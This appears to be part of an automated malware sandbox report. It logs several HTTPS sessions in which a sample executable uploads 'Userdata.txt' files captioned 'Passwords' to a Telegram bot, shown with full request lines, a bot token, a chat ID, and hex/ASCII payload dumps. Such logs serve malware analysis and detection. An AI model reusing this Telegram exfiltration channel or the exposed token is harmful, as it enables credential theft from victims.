                                                                                                            2025-01-10 21:32:02 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43585,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544721,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.350006149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:03 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd328cb97b4bfd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 63 62 39 37 62 34 62 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd328cb97b4bfdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:03 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:03 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 541
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:03 UTC541INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43586,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544723,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.350008149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:05 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd329f93438a7a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 66 39 33 34 33 38 61 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd329f93438a7aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:05 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:05 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:05 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43587,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544725,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.350010149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:06 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32b3b773e5e7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 33 62 37 37 33 65 35 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32b3b773e5e7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:06 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:06 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:06 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43588,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544726,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.350012149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:08 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32c3c9fc6045
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 33 63 39 66 63 36 30 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32c3c9fc6045Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:08 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:08 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43589,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544728,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.350014149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:09 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32d7d284421e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 37 64 32 38 34 34 32 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32d7d284421eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:10 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43590,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544729,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.350016149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:11 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32ebcbf40f9a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 62 63 62 66 34 30 66 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32ebcbf40f9aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:11 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:11 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:11 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43591,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544731,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.350018149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:13 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32fe62e3e93f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 21:32:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 65 36 32 65 33 65 39 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32fe62e3e93fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:13 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:13 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
